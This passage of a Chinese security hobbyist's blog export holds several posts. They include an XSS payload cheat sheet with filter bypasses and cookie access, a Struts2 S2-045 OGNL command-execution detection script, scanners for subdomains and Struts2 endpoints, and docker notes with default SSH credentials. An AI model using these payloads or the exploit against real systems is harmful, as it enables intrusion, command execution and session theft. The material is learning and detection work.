class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div></pre></td><td class="code"><pre><div class="line"><img src=1></div><div class="line"></div><div class="line"><script>alert(1);</script></div><div class="line"></div><div class="line"><iframe width="100" height="100" src="http://baidu.com"></iframe></div><div class="line"></div><div class="line"><SCRIPT SRC=http://baidu.com/xss.js></SCRIPT></div><div class="line"></div><div class="line"><img src=x onerror=alert('t')> 单引号</div><div class="line"></div><div class="line"><img src="1" onerror="alert(1)"> 双引号</div><div class="line"></div><div class="line"><img src=1 onerror=alert(1);> 分号</div><div class="line"></div><div class="line"><img src=x onerror=alert(1)> </div><div class="line"></div><div class="line"><svg/onload=alert(1)></div><div class="line"></div><div class="line"><svg/onload=alert(1)>;</div><div class="line"></div><div class="line"><svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg> svg</div><div class="line"></div><div class="line"><input onfocus=write(1) autofocus> </div><div class="line"></div><div class="line"><input onfocus=alert(1) autofocus></div><div class="line"></div><div class="line"><video onerror=”javascript:alert(1)”><source></div><div class="line"></div><div class="line"><img src="pic.gif" onerror="alert('1')"</div><div class="line"></div><div class="line"><img src="pic.gif" onerror="alert('1')" alt="test" title="test1" onclick="alert('2')"></div><div class="line"></div><div class="line"><img src=x.jpg onerror=alert(document.cookie)></div><div class="line"></div><div class="line"><video><source onerror="alert(1)"></div><div class="line"></div><div class="line"><body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus></div><div class="line"></div><div class="line"><img src=x onerror=alert(1)></div><div class="line"></div><div class="line"><video onerror=”javascript:alert(1)”><source></div><div class="line"></div><div class="line"><keygen autofocus onfocus=alert(1)></div><div class="line"></div><div class="line"><select autofocus onfocus=alert(1)></div><div class="line"></div><div class="line"><input onfocus=write(1) autofocus> chrome</div><div class="line"></div><div class="line">"><script src=data:,alert(1)<!-- 绕过浏览器</div><div class="line"></div><div class="line">常见闭合</div><div class="line"></script><script>alert(1)</script></div><div class="line"></div><div class="line">'></title><script>alert(1111)</script></div><div class="line"></div><div class="line">"><script>alert(1111)</script></div><div class="line"></div><div class="line">一些变形</div><div class="line"></script><script>alert(String.from+CharCode(88,%2083,%2083))</script></div><div class="line"></div><div class="line"><scr<script>ipt>alert('XSS');</scr</script>ipt></div><div class="line"></div><div class="line">iimgmg</div><div class="line"></div><div class="line"></div><div class="line">过滤了尖括号 括号</div><div class="line">可以使用</div><div class="line"></div><div class="line"> accesskey="X" onclick="confirm`1`"</div><div class="line">来自:</div><div class="line">http://blog.csdn.net/change518/article/details/51024706</div></pre></td></tr></table></figure>]]></content>
<tags>
<tag> web安全 </tag>
<tag> xss </tag>
</tags>
</entry>
<entry>
<title><![CDATA[10年]]></title>
<url>http://phpplay.github.io/2017/03/28/10%E5%B9%B4/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><h2 id="10年后,世界会是什么样子?"><a href="#10年后,世界会是什么样子?" class="headerlink" title="10年后,世界会是什么样子?"></a>10年后,世界会是什么样子?</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div></pre></td><td class="code"><pre><div class="line">飞行器的普及</div><div class="line">智能AI的出现</div><div class="line">自动化的实现</div><div class="line">机械取代人工</div><div class="line">异地化的办公</div><div class="line">人工将会廉价</div><div class="line">智力劳作赛高</div><div class="line">资源枯寂加速</div><div class="line">中国将会崛起</div></pre></td></tr></table></figure>
<p>也许会有war</p>
<p>也许人类在经历过信息大爆炸后,会进入一个瓶颈期,这段时间会很长</p>
<p>但我们的征途是星辰大海</p>
]]></content>
<tags>
<tag> life </tag>
</tags>
</entry>
<entry>
<title><![CDATA[dnslist]]></title>
<url>http://phpplay.github.io/2017/03/26/dnslist/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><h2 id="dnslist"><a href="#dnslist" class="headerlink" title="dnslist"></a>dnslist</h2><p>       前两天写了一个从dnslist采集二级域名的脚本,现在做个记录,这几天没有写,感觉好怪异的感觉,也许是外出了一次吧</p>
<h2 id="code"><a href="#code" class="headerlink" title="code"></a>code</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div></pre></td><td class="code"><pre><div class="line"><span class="comment">#!/usr/bin/env python</span></div><div class="line"><span class="comment"># encoding:utf-8</span></div><div class="line"><span class="keyword">import</span> requests</div><div class="line"><span class="keyword">import</span> re</div><div class="line"><span class="keyword">import</span> sys</div><div class="line"></div><div class="line"></div><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">subdm_get</span><span class="params">(domain)</span>:</span></div><div class="line"> </div><div class="line"> list3 = domain.split(<span class="string">"."</span>) </div><div class="line"> sss = <span class="string">''</span></div><div class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>, list3.__len__())[::<span class="number">-1</span>]:</div><div class="line"> sss = sss +list3[i]+<span class="string">'/'</span> </div><div class="line"> url = <span class="string">'http://dnslist.net/'</span> + sss</div><div class="line"> r = requests.get(url)</div><div class="line"> html = r.text</div><div class="line"> a = re.findall(<span class="string">r"<a.*?href=.*?<\/a>"</span>,html)</div><div class="line"> l = []</div><div class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> a:</div><div class="line"> url2 = i[i.find(<span class="string">'>'</span>)+<span class="number">1</span>:<span class="number">-4</span>] </div><div class="line"> l.append(url2)</div><div class="line"> <span class="keyword">return</span> l</div><div class="line"> </div><div class="line"></div><div class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</div><div class="line"> <span class="keyword">if</span> len(sys.argv) == <span class="number">2</span>:</div><div class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> subdm_get(sys.argv[<span class="number">1</span>]):</div><div class="line"> <span class="keyword">print</span> i</div><div class="line"> sys.exit()</div><div class="line"> <span class="keyword">else</span>:</div><div class="line"> <span class="keyword">print</span> (<span class="string">"usage: %s domain"</span> % sys.argv[<span class="number">0</span>])</div><div class="line"> sys.exit(<span class="number">-1</span>)</div></pre></td></tr></table></figure>]]></content>
<tags>
<tag> 网络安全 </tag>
<tag> python </tag>
</tags>
</entry>
<entry>
<title><![CDATA[docker笔记]]></title>
<url>http://phpplay.github.io/2017/03/21/dockerbj/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><h1 id="docker笔记"><a href="#docker笔记" class="headerlink" title="docker笔记"></a>docker笔记</h1><h2 id="1-安装"><a href="#1-安装" class="headerlink" title="1.安装"></a>1.安装</h2><p><a href="https://docs.docker.com/toolbox/toolbox_install_windows/#step-2-install-docker-toolbox" target="_blank" rel="external">https://docs.docker.com/toolbox/toolbox_install_windows/#step-2-install-docker-toolbox</a></p>
<p>注意:配置用户文件夹下的.bash_profile文件<br>内容为<br>export MACHINE_STORAGE_PATH=’D:\docker’</p>
<p>注意: 不管是安装还是后面的新建,基本都似乎使用admin权限的</p>
<h2 id="2-新建"><a href="#2-新建" class="headerlink" title="2.新建"></a>2.新建</h2><p>修改start.sh<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">"${DOCKER_MACHINE}" -s "D:\docker" create --engine-registry-mirror=https://docker.mirrors.ustc.edu.cn --virtualbox-hostonly-cidr "192.168.233.1/24" -d virtualbox $PROXY_ENV "${VM}"</div></pre></td></tr></table></figure></p>
<p>在bash 使用admin权限 运行start.sh第一次可能会说没用iso文件,所以把你安装文件夹下的 boot2docker.iso 复制到 d:\docker\cache (自定义) 文件夹后,再运行start.sh就好了</p>
<p>新建命令:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">dm -s "D:\docker" create --engine-registry-mirror=https://docker.mirrors.ustc.edu.cn --virtualbox-hostonly-cidr "192.168.233.1/24" -d virtualbox whoami</div></pre></td></tr></table></figure></p>
<p>-s 指定文件位置<br>–engine-registry-mirror 修改为国内源</p>
<p>-d virtualbox 指定vbox</p>
<p>环境变量设置</p>
<p>docker-machine env 你建的名字</p>
<p>执行返回来的最后一条语句,就可以把docker与之关联</p>
<p>docker run hello-world 测试是否可以运行</p>
<p>docker info docker 的详细信息</p>
<p>可以通过ssh 登陆docker user:docker 和 pass:tcuser </p>
<h2 id="3-镜像"><a href="#3-镜像" class="headerlink" title="3.镜像"></a>3.镜像</h2><p>docker build 不太会用,新建镜像的意思</p>
<p>docker pull ysrc/xunfeng 下载镜像</p>
<p>sudo docker run -d -p 8000:80 -v /opt/data ysrc/xunfeng:latest 运行镜像在8000端口</p>
<p>docker image 查看镜像</p>
<p>docker ps 查看运行中的镜像</p>
<p>docker ps 会显示image的运行ID 巡风有600+M</p>
<p>docker stop id</p>
]]></content>
<tags>
<tag> docker </tag>
<tag> linux </tag>
</tags>
</entry>
<entry>
<title><![CDATA[docker]]></title>
<url>http://phpplay.github.io/2017/03/20/docker/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><h2 id="docker"><a href="#docker" class="headerlink" title="docker"></a>docker</h2><p>       醉了,今天研究了一天的docker,我就不该让它运行在windows中,这是个错误啊,各种配置问题,各种解决。最后只汇聚成了一句精华<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">dm -s "D:\docker list" create --engine-registry-mirror=https://docker.mirrors.ustc.edu.cn --virtualbox-hostonly-cidr "192.168.233.1/24" -d virtualbox xxx</div></pre></td></tr></table></figure></p>
<p>       PS:老版本的docker真心不好用,其实原理就是简易的vbox么。</p>
<h2 id="docker漏洞相关"><a href="#docker漏洞相关" class="headerlink" title="docker漏洞相关"></a>docker漏洞相关</h2><p>现在的docker虚拟化才兴起,所以漏洞还是有一些的,找到一个相关的<a href="http://www.cnblogs.com/hanyifeng/p/5526799.html" target="_blank" rel="external">漏洞</a>,虚拟化这一片的洞也不少啊,还有就是git上有一些,比如CVE-2016-5195,都是用来逃逸的POC</p>
<p>代码git上就有<a href="https://github.com/gebl/dirtycow-docker-vdso" target="_blank" rel="external">code</a>.</p>
<h2 id="优点"><a href="#优点" class="headerlink" title="优点"></a>优点</h2><p>       它最大的有点就是方便,各种环境的开解部署,真心快。</p>
]]></content>
<tags>
<tag> docker </tag>
</tags>
</entry>
<entry>
<title><![CDATA[hexo]]></title>
<url>http://phpplay.github.io/2017/03/16/hexo/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><h2 id="hexo基础命令"><a href="#hexo基础命令" class="headerlink" title="hexo基础命令"></a>hexo基础命令</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line">hexo init 初始化</div><div class="line">hexo g 生成</div><div class="line">hexo s 本地服务</div><div class="line">hexo d 上传</div><div class="line">hexo clean 清除 public 用于增删改之后</div><div class="line">hexo new draft "new draft" 草稿功能(私密文章,不过放到git上也无所谓了)</div><div class="line">hexo publish 草稿变成文章</div></pre></td></tr></table></figure>
<h2 id="hexo基本语法"><a href="#hexo基本语法" class="headerlink" title="hexo基本语法"></a>hexo基本语法</h2><p><strong>重要的事情说三遍</strong>,hexo上到处都要<strong>2个空格</strong>,不同于一般的mackdown<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">\#\# 标题</div><div class="line">tags 分类 多个请使用[]</div><div class="line">缩进的话可以使用&\#160; &\#160; &\#160; &\#160; 来空两格</div></pre></td></tr></table></figure></p>
]]></content>
<tags>
<tag> hexo </tag>
</tags>
</entry>
<entry>
<title><![CDATA[目录扫描脚本]]></title>
<url>http://phpplay.github.io/2017/03/16/nscan/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><h2 id="学习"><a href="#学习" class="headerlink" title="学习"></a>学习</h2><p>       一直想搞一个批量扫描工具,最近试着写一下扫描struts2,所以打算自己写一个于是就有了这个demo。 </p>
<h3 id="我的demo"><a href="#我的demo" class="headerlink" title="我的demo"></a>我的demo</h3><p>       这次不再用urllib2了,因为301,302自动跳转问题有些蛋疼 -、-,所以用了requests,第一次用,我语法都没学完,直接写到昨晚2点多,因为自定义404的问题实在是不好判断,所以就找了些资料,思路大概也就是访问一个根本不可能存在的路径,和原扫描路径做比较,如果相似度大于百分之80,就直接舍弃。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">if</span> r.status_code == <span class="number">200</span> <span class="keyword">and</span> l1 != l2 <span class="keyword">and</span> <span class="string">'type'</span> <span class="keyword">in</span> r.text <span class="keyword">and</span> difflib.SequenceMatcher(<span class="keyword">None</span>, r2.text,r.text).ratio() < <span class="number">0.8</span></div></pre></td></tr></table></figure>
<pre><code>我使用了多个判断条件,首先是状态码,文件长度,type in 是为了判断是否是html,最后的那个是判断文本相似度。
完整的模块代码如下:
</code></pre><figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div></pre></td><td class="code"><pre><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">action_scan</span><span class="params">(url)</span>:</span></div><div class="line"> dirs = [<span class="string">"index.action"</span>,<span class="string">"home.action"</span>,<span class="string">"login.action"</span>,<span class="string">"main.action"</span>,<span class="string">"homepage.action"</span>]</div><div class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">5</span>):</div><div class="line"> furl = <span class="string">'http://'</span> + url + <span class="string">':8080/'</span> + dirs[i]</div><div class="line"> <span class="keyword">try</span>:</div><div class="line"> r = requests.get(furl,allow_redirects = <span class="keyword">False</span>,timeout=<span class="number">3</span>)</div><div class="line"> l1 = len(r.text)</div><div class="line"> r2 = requests.get(furl+<span class="string">'233323332333'</span>,allow_redirects = <span class="keyword">False</span>,timeout=<span class="number">3</span>)</div><div class="line"> l2 = len(r2.text)</div><div class="line"> <span class="keyword">if</span> r.status_code == <span class="number">200</span> <span class="keyword">and</span> l1 != l2 <span class="keyword">and</span> <span class="string">'type'</span> <span class="keyword">in</span> r.text <span class="keyword">and</span> difflib.SequenceMatcher(<span class="keyword">None</span>, r2.text,r.text).ratio() < <span class="number">0.8</span>:</div><div class="line"> </div><div class="line"> <span class="keyword">print</span> furl + <span class="string">' is ok'</span></div><div class="line"> file_object = open(<span class="string">'ok.txt'</span>, <span class="string">'a'</span>)</div><div class="line"> file_object.write(furl + <span class="string">'\n'</span>)</div><div class="line"> file_object.close()</div><div class="line"> <span class="keyword">else</span>:</div><div class="line"> <span class="keyword">print</span> furl + <span class="string">' is not ok'</span></div><div class="line"></div><div class="line"> </div><div class="line"> <span class="keyword">except</span> :</div><div class="line"> <span class="keyword">pass</span></div></pre></td></tr></table></figure>
<h3 id="反思"><a href="#反思" class="headerlink" title="反思"></a>反思</h3><p>       其实如果我只扫struts2的话,只要有一个可以判断的指纹就可以了,搞得这么复杂,我也是醉了,不过这个demo稍微改一下就可以变成一个web目录扫描了,至少它扫描struts2准确性很高了 </p>
<p>       接下来打算学习线程,顺便把语法补上来,否则根基太渣,容易垮掉啊。 </p>
]]></content>
<tags>
<tag> 网络安全 </tag>
<tag> python </tag>
</tags>
</entry>
<entry>
<title><![CDATA[python判断网络文件类型测试脚本]]></title>
<url>http://phpplay.github.io/2017/03/14/test/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><h2 id="测试"><a href="#测试" class="headerlink" title="测试"></a>测试</h2><p>       当时想起土司一个帖子,是通过文件头判断下载文件类型的思路来做一个挖掘姬,所以就想用python写一个,所以做了些测试。</p>
<h3 id=""><a href="#" class="headerlink" title=" "></a> </h3><figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div class="line">73</div><div class="line">74</div><div class="line">75</div><div class="line">76</div><div class="line">77</div><div class="line">78</div><div class="line">79</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">import</span> urllib2</div><div class="line"><span class="keyword">import</span> struct</div><div class="line"></div><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">typeList</span><span class="params">()</span>:</span> </div><div class="line"> <span class="keyword">return</span> { <span class="string">"52617221"</span>: <span class="string">"rar"</span>, <span class="string">"504B0304"</span>: <span class="string">"zip"</span> } </div><div class="line"></div><div class="line"></div><div class="line"></div><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">toHex</span><span class="params">(s)</span>:</span></div><div class="line"> lst = []</div><div class="line"> <span class="keyword">for</span> ch <span class="keyword">in</span> s:</div><div class="line"> hv = hex(ord(ch)).replace(<span class="string">'0x'</span>, <span class="string">''</span>)</div><div class="line"> <span class="keyword">if</span> len(hv) == <span class="number">1</span>:</div><div class="line"> hv = <span class="string">'0'</span>+hv</div><div class="line"> lst.append(hv)</div><div class="line"> </div><div class="line"> <span class="keyword">return</span> reduce(<span class="keyword">lambda</span> x,y:x+y, lst)</div><div class="line"></div><div class="line"></div><div class="line"></div><div class="line"></div><div class="line"></div><div class="line"><span class="keyword">try</span>:</div><div class="line"> </div><div class="line"> response = urllib2.urlopen(<span class="string">'http://127.0.0.1:8081/test.lnk.lnk'</span>,timeout=<span class="number">5</span>)</div><div class="line"> </div><div class="line"> code = response.getcode()</div><div class="line"> <span class="keyword">print</span> code </div><div class="line"> </div><div class="line"> <span class="comment">#print response.info()</span></div><div class="line"> </div><div class="line"> <span class="keyword">print</span> type(response)</div><div class="line"> </div><div class="line"> html = response.read(<span class="number">3</span>)</div><div class="line"> </div><div class="line"> <span class="keyword">print</span> type(html)</div><div class="line"> </div><div class="line"> </div><div class="line"> <span class="keyword">print</span> html</div><div class="line"> </div><div class="line"> </div><div class="line"> </div><div class="line"> ty1 =toHex(html).upper()</div><div class="line"> <span class="keyword">print</span> ty1</div><div class="line"> </div><div class="line"> <span class="keyword">if</span> ty1 == <span class="string">"526172"</span>:</div><div class="line"> <span class="keyword">print</span> <span class="string">'rar'</span></div><div class="line"> <span class="keyword">elif</span> ty1 == <span class="string">"504B03"</span>:</div><div class="line"> <span class="keyword">print</span> <span class="string">"zip"</span></div><div class="line"> <span class="keyword">else</span>:</div><div class="line"> <span class="keyword">print</span> <span class="string">"wu"</span></div><div class="line"> </div><div class="line"></div><div class="line"> <span class="comment"># print bytes2hex(response)</span></div><div class="line"> </div><div class="line"> </div><div class="line"></div><div class="line"> </div><div class="line"><span class="keyword">except</span> urllib2.URLError,e:</div><div class="line"> <span class="keyword">pass</span></div><div class="line"><span class="string">''' print "Failed to reach the server"</span></div><div class="line"> #print "The reason:",e.reason</div><div class="line"> elif hasattr(e,"code"):</div><div class="line"> print "The server couldn't fulfill the request"</div><div class="line"> print "Error code:",e.code</div><div class="line"> print "Return content:",e.read()</div><div class="line">else:</div><div class="line"> pass #其他异常的处理</div><div class="line"> </div><div class="line">'''</div><div class="line"></div><div class="line"></div><div class="line"><span class="string">"""</span></div><div class="line"> ty=typeList()</div><div class="line"> if ty1 in ty:</div><div class="line"> print "ok"</div><div class="line">"""</div></pre></td></tr></table></figure>
<h3 id="其它测试数据"><a href="#其它测试数据" class="headerlink" title="其它测试数据"></a>其它测试数据</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div></pre></td><td class="code"><pre><div class="line">JPEG (jpg) FFD8FF</div><div class="line">PNG (png) 89504E47</div><div class="line">GIF (gif) 47494638</div><div class="line">TIFF (tif) 49492A00</div><div class="line">Windows Bitmap (bmp) 424D</div><div class="line">CAD (dwg) 41433130</div><div class="line">Adobe Photoshop (psd) 38425053</div><div class="line">Rich Text Format (rtf) 7B5C727466</div><div class="line">XML (xml) 3C3F786D6C</div><div class="line">HTML (html) 68746D6C3E</div><div class="line">Email [thorough only] (eml) 44656C69766572792D646174653A</div><div class="line">Outlook Express (dbx) CFAD12FEC5FD746F</div><div class="line">Outlook (pst) 2142444E</div><div class="line">MS Word/Excel (xls.or.doc) D0CF11E0</div><div class="line">MS Access (mdb) 5374616E64617264204A</div><div class="line">WordPerfect (wpd) FF575043</div><div class="line">Postscript (eps.or.ps) 252150532D41646F6265</div><div class="line">Adobe Acrobat (pdf) 255044462D312E</div><div class="line">Quicken (qdf) AC9EBD8F</div><div class="line">Windows Password (pwl) E3828596</div><div class="line">ZIP Archive (zip) 504B0304</div><div class="line">RAR Archive (rar) 52617221</div><div class="line">Wave (wav) 57415645</div><div class="line">AVI (avi) 41564920</div><div class="line">Real Audio (ram) 2E7261FD</div><div class="line">Real Media (rm) 2E524D46</div><div class="line">MPEG (mpg) 000001BA</div><div class="line">MPEG (mpg) 000001B3</div><div class="line">Quicktime (mov) 6D6F6F76</div><div class="line">Windows Media (asf) 3026B2758E66CF11</div><div class="line">MIDI (mid) 4D546864</div></pre></td></tr></table></figure>
<h3 id="测试区"><a href="#测试区" class="headerlink" title="测试区"></a>测试区</h3><div class="owl-media owl-video owl-bilibili"><embed src="http://static.hdslb.com/miniloader.swf" flashvars="aid=247371&page=1" pluginspage="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" quality="high" allowfullscreen="true"></div>
<div id="aplayer0" class="aplayer" style="margin-bottom: 20px;"></div>
<script>
new APlayer({
element: document.getElementById("aplayer0"),
narrow: false,
autoplay: false,
showlrc: 0,
music: {
title: "她的睫毛",
author: "周杰伦",
url: "http://home.ustc.edu.cn/~mmmwhy/%d6%dc%bd%dc%c2%d7%20-%20%cb%fd%b5%c4%bd%de%c3%ab.mp3",
pic: "http://home.ustc.edu.cn/~mmmwhy/jay.jpg",
}
});
</script>
<embed height="415" width="544" quality="high" allowfullscreen="true" type="application/x-shockwave-flash" src="//static.hdslb.com/miniloader.swf" flashvars="aid=9057376&page=1" pluginspage="//www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash">
]]></content>
<tags>
<tag> 网络安全 </tag>
<tag> python </tag>
</tags>
</entry>
<entry>
<title><![CDATA[关于struts2-045漏洞的脚本编写]]></title>
<url>http://phpplay.github.io/2017/03/14/whoami/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><h2 id="始末"><a href="#始末" class="headerlink" title="始末"></a>始末</h2><p>       struts2-045漏洞是在2017.3.7被安恒放出的,而很多公司都是在一个月以前获得的通知,所以内部圈子里面都是很早以前就开始玩了。poc在3.7日当天被放出来,所以批量检测工具也很快就被各黑阔论坛开发出来,然而这个时间段很是敏感,所以没爆什么大新闻。<br>       当时自己闲着没事也写一个检测的DEMO,还是很简单的,当时还知道了一个很溜的工具<a href="https://www.getpostman.com/" target="_blank" rel="external">postman</a>。</p>
<h3 id="我的DEMO"><a href="#我的DEMO" class="headerlink" title="我的DEMO"></a>我的DEMO</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">import</span> urllib2</div><div class="line">url=<span class="string">"http://text.com/index.action"</span></div><div class="line">req = urllib2.Request(url)</div><div class="line">req.add_header(<span class="string">'User-agent'</span>,<span class="string">"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"</span>)</div><div class="line">req.add_header(<span class="string">'Content-Type'</span>,<span class="string">"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo 11987654321').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"</span>)</div><div class="line">res = urllib2.urlopen(req)</div><div class="line">html = res.read()</div><div class="line"><span class="keyword">print</span> html</div><div class="line"><span class="keyword">if</span> <span class="string">"11987654321"</span> <span class="keyword">in</span> html:</div><div class="line"> <span class="keyword">print</span> url + <span class="string">" is OK"</span></div></pre></td></tr></table></figure>
<h3 id="获取路径"><a href="#获取路径" class="headerlink" title="获取路径"></a>获取路径</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"></div><div class="line">req.add_header(<span class="string">'User-agent'</span>,<span class="string">"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"</span>)</div><div class="line">req.add_header(<span class="string">'Content-Type'</span>,<span class="string">"%{(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#luan='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#path=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest').getSession().getServletContext().getRealPath('/')).(#cmd='echo '+#path).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"</span>)</div></pre></td></tr></table></figure>
